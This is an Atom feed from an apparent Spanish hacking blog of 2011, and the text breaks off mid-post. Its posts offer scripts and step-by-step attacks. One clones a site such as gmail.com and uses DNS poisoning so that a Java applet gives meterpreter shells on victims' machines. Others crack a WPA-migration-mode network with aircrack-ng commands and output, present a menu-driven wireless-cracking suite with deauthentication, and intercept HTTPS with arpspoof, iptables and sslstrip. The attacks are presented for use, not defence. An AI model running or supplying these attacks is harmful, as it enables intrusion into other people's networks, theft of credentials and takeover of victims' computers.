<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-2008706321168476881</id><updated>2012-02-16T10:18:27.642+01:00</updated><category term='WPA WPA2 Craking Cracked Owned aircrack-ng 1.2'/><category term='Cracking WPA WPA2 WEP Aircrack-ng packetforge-ng aireplay-ng'/><category term='metasploit SET ettercap DNS Poisoning DNS Spoofing Script'/><category term='MiTM SSLStrip HTTP HTTPS SSL TLS IPTables'/><title type='text'>Breaking The Code</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://btcode.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2008706321168476881/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://btcode.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>RocKHounD</name><uri>http://www.blogger.com/profile/15257148657067649155</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/-Us6BLqK9NNw/TX1JKk7_gxI/AAAAAAAAACg/BnQgIJA1rJc/s220/ROCKHOUND.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>5</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-2008706321168476881.post-4841889193983249559</id><published>2011-01-21T00:00:00.003+01:00</published><updated>2011-01-21T08:17:27.481+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='metasploit SET ettercap DNS Poisoning DNS Spoofing Script'/><title type='text'>Realizando Clone Site JAVA Attack Bypass AV</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_qLl8Ru54qEE/TTky9Sji1vI/AAAAAAAAABM/UiWHK1jLzRQ/s1600/Navegadores.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="228" src="http://3.bp.blogspot.com/_qLl8Ru54qEE/TTky9Sji1vI/AAAAAAAAABM/UiWHK1jLzRQ/s320/Navegadores.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;u&gt;&lt;b&gt;Descargar Script &lt;a href="http://www.mediafire.com/?hay2tqrflx8gtv3"&gt;RockHound_clone_web_JavaAttack.sh&lt;/a&gt;&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Este ataque se basa en la clonacion de una web a nuestra eleccion para ganar una shell en el equipo remoto.&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;b style="color: red;"&gt;Probado en IE6, IE7, IE8, Safari, Chrome y FireFox &lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Una vez clonada la web que hemos elegido, mediante envenenamiento DNS dirigimos a los Host de la red a ella, ejecutando a si automaticamente el&amp;nbsp; applet y obteniendo una meterpreter shell en el equipo victima&lt;br /&gt;&lt;br /&gt;Ejemplo de Uso:&lt;br /&gt;&lt;br /&gt;Seleccionamos el protocolo de la web a clonar: &lt;b style="color: red;"&gt;http&lt;/b&gt; o &lt;b&gt;&lt;span style="color: red;"&gt;https&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;Seleccionamos la web a ser clonada: &lt;b style="color: red;"&gt;gmail.com&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;automaticamente sera lanzado ettercap para el envenenamiento en una ventana emergente y levantado el servidor en la consola principal.&lt;br /&gt;&lt;br /&gt;Esperad a que ettercap barra la red en busca de host.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2008706321168476881-4841889193983249559?l=btcode.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://btcode.blogspot.com/feeds/4841889193983249559/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://btcode.blogspot.com/2011/01/realizando-clone-site-java-attack.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2008706321168476881/posts/default/4841889193983249559'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2008706321168476881/posts/default/4841889193983249559'/><link rel='alternate' type='text/html' href='http://btcode.blogspot.com/2011/01/realizando-clone-site-java-attack.html' title='Realizando Clone Site JAVA Attack Bypass AV'/><author><name>RocKHounD</name><uri>http://www.blogger.com/profile/15257148657067649155</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/-Us6BLqK9NNw/TX1JKk7_gxI/AAAAAAAAACg/BnQgIJA1rJc/s220/ROCKHOUND.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_qLl8Ru54qEE/TTky9Sji1vI/AAAAAAAAABM/UiWHK1jLzRQ/s72-c/Navegadores.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2008706321168476881.post-6632039738469418790</id><published>2011-01-20T16:22:00.004+01:00</published><updated>2011-01-20T16:33:38.217+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='WPA WPA2 Craking Cracked Owned aircrack-ng 1.2'/><title type='text'>WPA Modo Migración</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_qLl8Ru54qEE/TThUYDhbGYI/AAAAAAAAABI/4V-bcqs8K8g/s1600/istock_000002049455xsmall.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="238" src="http://1.bp.blogspot.com/_qLl8Ru54qEE/TThUYDhbGYI/AAAAAAAAABI/4V-bcqs8K8g/s320/istock_000002049455xsmall.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;WPA Migration Mode, es un modo de configuración soportado por los puntos de acceso Cisco Aironet para las IOS 12.2(11)JA y superiores.&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;Esta habilita ambos cifrados, WPA y WEP para ser asociados al AP usando el mismo identificador, (ESSID).&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;Para ello se asume que disponemos de lo siguiente antes de proceder:&lt;/b&gt;&lt;br /&gt;&lt;b&gt;Usamos drivers propiamente parcheados para la inyeccion.&lt;/b&gt;&lt;br /&gt;&lt;b&gt;Estamos cerca del punto de acceso&lt;/b&gt;&lt;br /&gt;&lt;b&gt;Estamos usando la versión 1.2 de Aircrack o superior.&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;Escenario: &lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul style="color: red;"&gt;&lt;li&gt;MAC address del host atacante: 00:1f:3c:4e:88:46 &lt;/li&gt;&lt;li&gt;BSSID : 00:26:0B:2A:BA:40 &lt;/li&gt;&lt;li&gt;ESSID : migrate &lt;/li&gt;&lt;li&gt;Canal: 8 &lt;/li&gt;&lt;li&gt;Interfaz: wlan0 &lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;/ul&gt;&lt;br /&gt;&lt;b&gt;Empezamos:&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;ol&gt;&lt;li class="level1"&gt;&lt;div class="li"&gt;&lt;b&gt;Creamos la interfaz monitor en el canal del AP&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;&lt;li class="level1"&gt;&lt;div class="li"&gt;&lt;b&gt;Lanzamos airodump-ng filtrando por el canal y BSSID del AP, también filtramos para obtener solo IV´s&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;&lt;li class="level1"&gt;&lt;div class="li"&gt;&lt;b&gt;Lanzamos Aireplay-ng para realizar autenticaciones falsas contra el AP&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;&lt;li class="level1"&gt;&lt;div class="li"&gt;&lt;b&gt;Lanzamos Aireplay-ng en "WPA Migration Mode" para inyectar tráfico.&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;&lt;li class="level1"&gt;&lt;div class="li"&gt;&lt;b&gt;Lanzamos Aircrack-ng para obtener la clave.&lt;/b&gt;&lt;/div&gt;&lt;/li&gt;&lt;/ol&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="level3" style="color: red;"&gt;&lt;pre class="code"&gt;&lt;b&gt;airodump-ng -c 8 --bssid 00:26:0B:2A:BA:40 -w output mon0&lt;/b&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="level3"&gt;&lt;div class="li"&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_qLl8Ru54qEE/TThQckd10wI/AAAAAAAAABE/tMkgNfrGk-w/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="105" src="http://2.bp.blogspot.com/_qLl8Ru54qEE/TThQckd10wI/AAAAAAAAABE/tMkgNfrGk-w/s400/1.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre class="code"&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre class="code"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/pre&gt;&lt;pre class="code"&gt;&lt;b&gt;Ahora realizamos una autenticación fallida al punto de acceso.&lt;/b&gt;&lt;/pre&gt;&lt;pre class="code"&gt;&lt;b&gt;Para ello debe de haber al menos una mac address asociada al punto&lt;/b&gt;&lt;/pre&gt;&lt;pre class="code"&gt;&lt;b&gt;para que no ignore el AP nuestro tráfico. &lt;/b&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="level3"&gt;&lt;pre class="code"&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre class="code" style="color: red;"&gt;&lt;b&gt;aireplay-ng -1 0 -e migrate –a 00:26:0B:2A:BA:40&lt;/b&gt;&lt;/pre&gt;&lt;pre class="code" style="color: red;"&gt;&lt;b&gt;-h 00:1f:3c:4e:88:46 mon0&lt;/b&gt;&lt;/pre&gt;&lt;pre class="code" style="color: red;"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="level3" style="color: red;"&gt;12:27:40  Waiting for beacon frame (BSSID: 00:26:0B:2A:BA:40) on channel 8&lt;/div&gt;&lt;div class="level3" style="color: red;"&gt;12:27:40  Sending Authentication Request (Open System) [ACK]&lt;/div&gt;&lt;div class="level3" style="color: red;"&gt;12:27:40  Authentication successful 12:27:40  Sending Association Request [ACK]&lt;/div&gt;&lt;div class="level3"&gt;&lt;div style="color: red;"&gt;12:27:40  Association successful :-) (AID: 1)&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Si obtenemos paquetes de desautenticación, lo intentamos de nuevo hasta que funcione, sin que esto tenga éxito no podemos seguir adelante.&lt;/b&gt;&lt;/div&gt;&lt;div class="level3"&gt;&lt;b&gt;Vamos a lanzar aireplay-ng en "Migration Mode"&lt;/b&gt;&lt;/div&gt;&lt;div class="level3"&gt;&lt;br /&gt;&lt;pre class="code" style="color: red;"&gt;&lt;b&gt;aireplay-ng -8 -b 00:26:0B:2A:BA:40  -h 00:1f:3c:4e:88:46 mon0&lt;/b&gt;&lt;/pre&gt;&lt;div style="color: red;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre class="code" style="color: red;"&gt;12:17:52  Waiting for beacon frame (BSSID: 00:26:0B:2A:BA:40)&lt;/pre&gt;&lt;pre class="code" style="color: red;"&gt;on channel 8&lt;br /&gt;Saving ARP requests in replay_arp-0811-121752.cap&lt;br /&gt;You should also start airodump-ng to capture replies.&lt;br /&gt;Remember to filter the capture to only keep WEP frames:&lt;/pre&gt;&lt;pre class="code" style="color: red;"&gt;"tshark -R 'wlan.wep.iv' -r capture.cap -w outcapture.cap"&lt;br /&gt;Read 318368 packets (102102 ARPs, 78 ACKs),&lt;/pre&gt;&lt;pre class="code" style="color: red;"&gt;sent 59315 packets..(500 pps)&lt;/pre&gt;&lt;pre class="code" style="color: red;"&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre class="code" style="color: red;"&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre class="code"&gt;&lt;/pre&gt;&lt;pre class="code"&gt;&lt;b&gt;Podemos confirmar que estamos inyectando correctamente ya que&lt;/b&gt;&lt;/pre&gt;&lt;pre class="code"&gt;&lt;b&gt;los datas suben rápidamente.&lt;/b&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="level3"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;pre class="code"&gt;&lt;b&gt;Finalmente Lanzamos Aircrack-ng para obtener la clave. &lt;/b&gt;&lt;/pre&gt;&lt;pre class="code"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/pre&gt;&lt;pre class="code" style="color: red;"&gt;&lt;b&gt;aircrack-ng -a 1 -b 00:26:0B:2A:BA:40 output*.cap&lt;/b&gt;&lt;/pre&gt;&lt;div style="color: red;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;pre class="code"&gt;Aircrack-ng 1.2&lt;br /&gt;[00:00:00] Tested 763 keys (got 47981 IVs)&lt;/pre&gt;&lt;/div&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: red; text-align: center;"&gt;KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA ]&lt;br /&gt;Decrypted correctly: 100%&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;Traducción e interpretación: Propia.&lt;/div&gt;&lt;div style="text-align: left;"&gt;Fuente: &lt;a href="http://www.aircrack-ng.org/doku.php?id=wpa_migration_mode"&gt;Aircrack-ng&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2008706321168476881-6632039738469418790?l=btcode.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://btcode.blogspot.com/feeds/6632039738469418790/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://btcode.blogspot.com/2011/01/wpa-modo-migracion.html#comment-form' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2008706321168476881/posts/default/6632039738469418790'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2008706321168476881/posts/default/6632039738469418790'/><link rel='alternate' type='text/html' href='http://btcode.blogspot.com/2011/01/wpa-modo-migracion.html' title='WPA Modo Migración'/><author><name>RocKHounD</name><uri>http://www.blogger.com/profile/15257148657067649155</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/-Us6BLqK9NNw/TX1JKk7_gxI/AAAAAAAAACg/BnQgIJA1rJc/s220/ROCKHOUND.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_qLl8Ru54qEE/TThUYDhbGYI/AAAAAAAAABI/4V-bcqs8K8g/s72-c/istock_000002049455xsmall.jpg' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2008706321168476881.post-3552627013695421194</id><published>2011-01-20T08:42:00.068+01:00</published><updated>2011-01-20T13:48:04.983+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Cracking WPA WPA2 WEP Aircrack-ng packetforge-ng aireplay-ng'/><title type='text'>Suite Hacking Wireless</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://main.makeuseoflimited.netdna-cdn.com/wp-content/uploads/2010/08/wirelesssecurity.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://main.makeuseoflimited.netdna-cdn.com/wp-content/uploads/2010/08/wirelesssecurity.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;u&gt;&lt;b&gt;Descargar Script &lt;a href="http://www.mediafire.com/?y7atjignc5ssz19"&gt;RockHound_Wireless.sh&lt;/a&gt;&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Voy a ir explicando cada opción paso a paso para su perfecto entendimiento.&lt;br /&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;1. Escanear todas las redes con cifrado WEP&lt;/div&gt;&lt;ul&gt;&lt;li&gt;Airodump-ng escanea todos los canales, para escoger una linea en particular, presionar Ctrl + C y os pedirá varios datos.&lt;/li&gt;&lt;/ul&gt;&lt;div style="color: red;"&gt;2. Escanear todas las redes con cifrado WPA&lt;/div&gt;&lt;ul&gt;&lt;li&gt;Airodump-ng escanea todos los canales, para escoger una linea en particular, presionar Ctrl + C y os pedirá varios datos. &lt;/li&gt;&lt;/ul&gt;&lt;div style="color: red;"&gt;3. Lanzar Aireplay-ng modo Selectivo&lt;/div&gt;&lt;ul&gt;&lt;li&gt;Este ataque permite elegir un paquete en concreto para ser inyectado de nuevo en la red.&lt;/li&gt;&lt;li&gt;También permite lanzar un paquete modificado a la red con Packetforge-ng&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;4. Lanzar Aireplay-ng modo inyectar ARP&lt;/div&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;El clasico ataque para la reinyección de ARP´s en la red, su funcionamiento es simple, espera a obtener paquetes ARP y vuelve a introducirlos dentro.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;5. Lanzar Aireplay-ng modo asociacion falsa&lt;/div&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;La autenticación falsa permite asociarse a un punto de acceso que tenga su autenticación como OPEN y Shared Key, solo es necesaria cuando no hay clientes asociados.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;6. Lanzar Aireplay-ng fragmentado para obtener PRGA&lt;/div&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Cuando este ataque tenga éxito, pueda desencriptar un paquete WEP sin conocer la clave.&lt;/li&gt;&lt;li&gt;Con esto obtendremos un archivo PRGA el cual contiene datos de la red que son muy útiles a la hora de crear nuestro propio paquete.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;7. Lanzar Packetforge-ng para crear un paquete ARP&lt;/div&gt;&lt;br /&gt;&lt;div class="level2"&gt;&lt;ul&gt;&lt;li&gt;El propósito es crear paquetes encriptados para la inyección.&lt;/li&gt;&lt;li&gt;Pueden crearse varios tipos como, ARP, UDP, ICMP y customizados, el más común es ARP.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;8. Lanzar Aireplay-ng para inyectar el paquete creado&lt;/div&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Inyecta el paquete creado de nuevo en la red para obtener multiples IV´s &lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;9. Lanzar Aireplay-ng para realizar una denegacion&lt;/div&gt;&lt;ul&gt;&lt;li&gt;Es un ataque usado para desasociar a uno o más clientes de una red.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Estos pueden ser desasociados por varias razones: &lt;/li&gt;&lt;/ul&gt;&lt;ol&gt;&lt;ol&gt;&lt;li&gt;Recuperar un ESSID Oculto&amp;nbsp;&lt;/li&gt;&lt;li&gt;Capturar HandShake WPA/WPA2&lt;/li&gt;&lt;li&gt;Generar multiples peticiones ARP para ser reinyectadas.&lt;/li&gt;&lt;/ol&gt;&lt;/ol&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;10. Crear un diccionario para redes WLAN_XX&lt;/div&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Crea automáticamente un diccionario para redes WLAN_XX &lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;11. Lanzar Aircrack-ng PTW para crackear la password&lt;/div&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Intenta crackear la password con los datos obtenidos.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;12. Lanzar Aircrack-ng para crackear una password WLAN_XX&lt;/div&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Crackear Password tipo ESSID --&amp;gt; WLAN_XX (Requiere wlandecrypter en /usr/sbin) &lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;13. Cambiar Mac Asociada&lt;/div&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Cambia la mac address de tu tarjeta por la del cliente asociado al AP para que el ataque tenga éxito.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;14. Probar Si la tarjeta Inyecta correctamente&lt;/div&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Realiza un testeo contra el AP escogido para ver si es cierto que la tarjeta es compatible.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;15. Modificar la sensibilidad de la tarjeta&lt;/div&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Modifica la sensibilidad de la tarjeta a 1M si la distancia con el AP no es lo suficientemente cercana. &lt;/li&gt;&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2008706321168476881-3552627013695421194?l=btcode.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://btcode.blogspot.com/feeds/3552627013695421194/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://btcode.blogspot.com/2011/01/suite-hacking-wireless.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2008706321168476881/posts/default/3552627013695421194'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2008706321168476881/posts/default/3552627013695421194'/><link rel='alternate' type='text/html' href='http://btcode.blogspot.com/2011/01/suite-hacking-wireless.html' title='Suite Hacking Wireless'/><author><name>RocKHounD</name><uri>http://www.blogger.com/profile/15257148657067649155</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/-Us6BLqK9NNw/TX1JKk7_gxI/AAAAAAAAACg/BnQgIJA1rJc/s220/ROCKHOUND.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2008706321168476881.post-4815567536616421270</id><published>2011-01-19T11:47:00.004+01:00</published><updated>2011-01-21T01:14:19.355+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='MiTM SSLStrip HTTP HTTPS SSL TLS IPTables'/><title type='text'>Man In The Middle y SSLStrip, Teoría, Práctica y Script.</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;u&gt;&lt;b&gt;Descargar Script &lt;a href="http://www.mediafire.com/?aavcl0rpldatgn0"&gt;RockHound_Mitm_SSLStrip.sh&lt;/a&gt;&lt;/b&gt;&lt;/u&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;img border="0" height="640" src="http://2.bp.blogspot.com/_qLl8Ru54qEE/TTa-e8M3bII/AAAAAAAAAA8/RUIzrjtI6DI/s640/ssl02.jpg" width="473" /&gt;&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;En la imagen de arriba se describe el histórico de los pasos que sigue una comunicación SSL entre el cliente y Servidor.&lt;br /&gt;&lt;br /&gt;Cuando se inicia la conexión, el nivel de registro encapsula otro protocolo, el protocolo &lt;i&gt;handshake&lt;/i&gt;, que tiene el &lt;i&gt;content_type&lt;/i&gt; 22.&lt;br /&gt;El cliente envía y recibe varias estructuras &lt;i&gt;handshake&lt;/i&gt;:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Envía un mensaje &lt;i&gt;ClientHello&lt;/i&gt; especificando una lista de  conjunto de cifrados, métodos de compresión y la versión del protocolo  SSL más alta permitida. Éste también envía bytes aleatorios que serán  usados más tarde (llamados &lt;i&gt;Challenge de Cliente&lt;/i&gt; o &lt;i&gt;Reto&lt;/i&gt;). Además puede incluir el identificador de la sesión.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Después, recibe un registro &lt;i&gt;ServerHello&lt;/i&gt;, en el que el servidor elige los parámetros de conexión a partir de las opciones ofertadas con anterioridad por el cliente.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Cuando los parámetros de la conexión son conocidos, cliente y  servidor intercambian certificados (dependiendo de las claves públicas  de cifrado seleccionadas). Estos certificados son actualmente &lt;a href="http://es.wikipedia.org/wiki/X.509" title="X.509"&gt;X.509&lt;/a&gt;, pero hay también un borrador especificando el uso de certificados basados en &lt;a class="mw-redirect" href="http://es.wikipedia.org/wiki/OpenPGP" title="OpenPGP"&gt;OpenPGP&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;El servidor puede requerir un certificado al cliente, para que la conexión sea mutuamente autenticicada.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Cliente y servidor negocian una clave secreta (simétrica) común llamada &lt;i&gt;master secret&lt;/i&gt;, posiblemente usando el resultado de un intercambio &lt;a href="http://es.wikipedia.org/wiki/Diffie-Hellman" title="Diffie-Hellman"&gt;Diffie-Hellman&lt;/a&gt;,  o simplemente cifrando una clave secreta con una clave pública que es  descifrada con la clave privada de cada uno. Todos los datos de claves  restantes son derivados a partir de este &lt;i&gt;master secret&lt;/i&gt; (y los valores aleatorios generados en el cliente y el servidor), que son pasados a través una &lt;i&gt;función &lt;a class="new" href="http://es.wikipedia.org/w/index.php?title=Pseudoaleatoriedad&amp;amp;action=edit&amp;amp;redlink=1" title="Pseudoaleatoriedad (aún no redactado)"&gt;pseudoaleatoria&lt;/a&gt;&lt;/i&gt; cuidadosamente elegida. [...]&lt;/li&gt;&lt;/ul&gt;Extraido: Sigue leyendo sobre SSL y TLS en&amp;nbsp; &lt;a href="http://es.wikipedia.org/wiki/Transport_Layer_Security#C.C3.B3mo_funciona"&gt;Wikipedia&lt;/a&gt;&amp;nbsp; &lt;br /&gt;&lt;ul&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;El objetivo del ataque es interceptar dicha comunicación, enrutarla y capturar su contenido.&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;&lt;b&gt;Habilitamos el bit de forwarding.&lt;/b&gt;&lt;/div&gt;echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;&lt;b&gt;Modificamos IPTables para el enrutamiento.&lt;/b&gt;&lt;/div&gt;iptables -t nat -A PREROUTING -p tcp --destination-p 80 -j REDIRECT --to-p 8080&lt;br /&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;&lt;b&gt;Realizamos ARP Spoofing &lt;/b&gt;&lt;/div&gt;arpspoof -i interfaz -t ip_víctima ip_router&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;&lt;b&gt;Iniciamos Finalmente SSLStript &lt;/b&gt;&lt;/div&gt;sslstrip -w capturaSSLStrip 